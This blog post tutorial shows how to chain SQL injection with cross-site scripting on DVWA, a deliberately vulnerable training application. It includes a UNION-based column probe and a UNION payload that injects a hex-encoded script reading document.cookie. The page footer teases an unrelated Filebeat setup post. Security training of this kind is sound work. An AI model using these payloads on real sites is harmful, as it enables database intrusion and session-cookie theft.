How to Exploit compound sql injection (sql injection with xss)





Here I am using DVWA to show the real time example of sql injection with XSS

I am using a simple java script i.e.  <script>alert(document.cookie)</script>

So open your DVWA and go to the sql injection tab.






To find the number of columns pass this string ' UNION SELECT 1,2 --  and got the result like this 



Here in the above screenshot it is showing the two columns.  

Now I will try to inject xss script into sql query. Here I am using script   <script>alert(document.cookie)</script> and hex encoded value of this script is 0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E.

So the payload will be ' UNION SELECT 1, 0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E -- 

 
 





Thanks ...







Comments

Post a Comment

Popular posts from this blog

Filebeat configuration for ELK

Filebeat Configuration for ELK Stack Filebeat is a log shipper which can be used for linux and windows both. It is generally use for sending the logs to the server. As I am using filebeat for my ELK stack (ubuntu server), So filebeat sends logs to the logstash server. While communicating with filebeat, logstash use lumberjack protocol. Installation steps :  first you have to add the beats repository for APT :              Run the following commands: $ wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -    $ echo "deb https://artifacts.elastic.co/packages/5.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list After this install the filebeat package $ sudo apt-get update $ sudo apt-get install filebeat After installation next step is configuration of filebeat Here we are configuring filebeat to sends logs to the logstash server. The configuration file of filebeat is in the /etc/filebeat dire
Read more